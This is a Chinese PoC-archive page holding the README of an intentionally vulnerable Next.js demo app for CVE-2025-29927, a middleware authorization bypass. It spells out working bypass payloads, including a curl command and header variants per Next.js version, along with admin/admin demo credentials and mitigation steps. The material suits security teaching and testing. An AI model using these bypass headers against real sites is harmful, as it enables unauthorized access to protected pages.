POC详情: 69091069268e6c9bc81ad389414d22b2a8251cec

来源
关联漏洞
标题: Next.js 安全漏洞 (CVE-2025-29927)
描述:Next.js是Vercel开源的一个 React 框架。 Next.js 14.2.25之前版本和15.2.3之前版本存在安全漏洞,该漏洞源于如果授权检查发生在中间件中,可能绕过授权检查。
描述
🔓 Next.js Auth Bypass Demo - Educational application demonstrating CVE-2025-29927 middleware authentication bypass vulnerability . ⚠️ For educational use only.
介绍
# Hello World - Next.js 12.2

A simple proof of concept Next.js 12.2 application.

## 🚀 Quick Start

### 1. Install Dependencies
```bash
npm install
```

### 2. Run the Development Server
```bash
npm run dev
```

The application will be available at `http://localhost:3000`


## 🛠️ Available Scripts

- `npm run dev` - Start development server
- `npm run build` - Build for production
- `npm run start` - Start production server

## 🎯 Features

- ✅ **Next.js 12.2** - Latest stable version
- ✅ **React 18.2** - Modern React features
- ✅ **Simple Design** - Clean, responsive UI
- ✅ **Authentication System** - Login with hardcoded credentials
- ✅ **Admin Panel** - Protected dashboard with sensitive data
- ✅ **Vulnerable Middleware** - Demonstrates auth bypass techniques
- ✅ **Exploit Demo** - Easy to reproduce security issues

## 🔧 Customization

Edit `pages/index.js` to modify the Hello World page. The application uses inline styles for simplicity, but you can add CSS files or styling libraries as needed.

## 🔓 CVE-2025-29927 Security Demo

This application demonstrates the **CVE-2025-29927** vulnerability discovered by Rachid.A (zhero) and Yasser Allam (inzo_):

### 📋 Vulnerability Details
- **CVE:** CVE-2025-29927
- **CVSS:** 9.1/10 (Critical)
- **Affected:** Next.js 11.1.4 - 15.2.2
- **Impact:** Complete middleware bypass using `x-middleware-subrequest` header

### 🎯 Demo Credentials
- **Username:** `admin`
- **Password:** `admin`

### 🚨 CVE-2025-29927 Exploit Methods
1. **Browser Extension (ModHeader)** - Add `x-middleware-subrequest: middleware` header
2. **JavaScript Console** - Use fetch with the bypass header
3. **cURL Exploit** - `curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin`
4. **Python Requests** - Add header to bypass middleware completely

### 🔧 Payload Variations
- **Next.js 12.2+:** `x-middleware-subrequest: middleware`
- **With /src directory:** `x-middleware-subrequest: src/middleware`
- **Next.js 15.x:** `x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware`


### 🛡️ Mitigation
- Update to Next.js 15.2.3+ (14.2.25+ for 14.x)
- Block `x-middleware-subrequest` header at proxy/CDN level
- Implement additional server-side validation

**⚠️ WARNING: This demonstrates a real CVE for educational purposes only!**

## 📦 Dependencies

- **next**: 12.2.0
- **react**: 18.2.0
- **react-dom**: 18.2.0

## 🎨 Styling

This application uses inline styles for simplicity. For a production app, consider using:
- CSS Modules
- Styled Components
- Tailwind CSS
- Or any other styling solution

---

**Happy coding! 🚀** 
文件快照

[4.0K] /data/pocs/69091069268e6c9bc81ad389414d22b2a8251cec ├── [ 725] middleware.js ├── [ 118] next.config.js ├── [ 268] package.json ├── [ 14K] package-lock.json ├── [4.0K] pages │   ├── [7.1K] admin.js │   ├── [4.0K] api │   │   ├── [ 615] login.js │   │   └── [ 381] logout.js │   ├── [ 96] _app.js │   ├── [3.9K] index.js │   └── [4.3K] login.js └── [2.6K] README.md 2 directories, 11 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。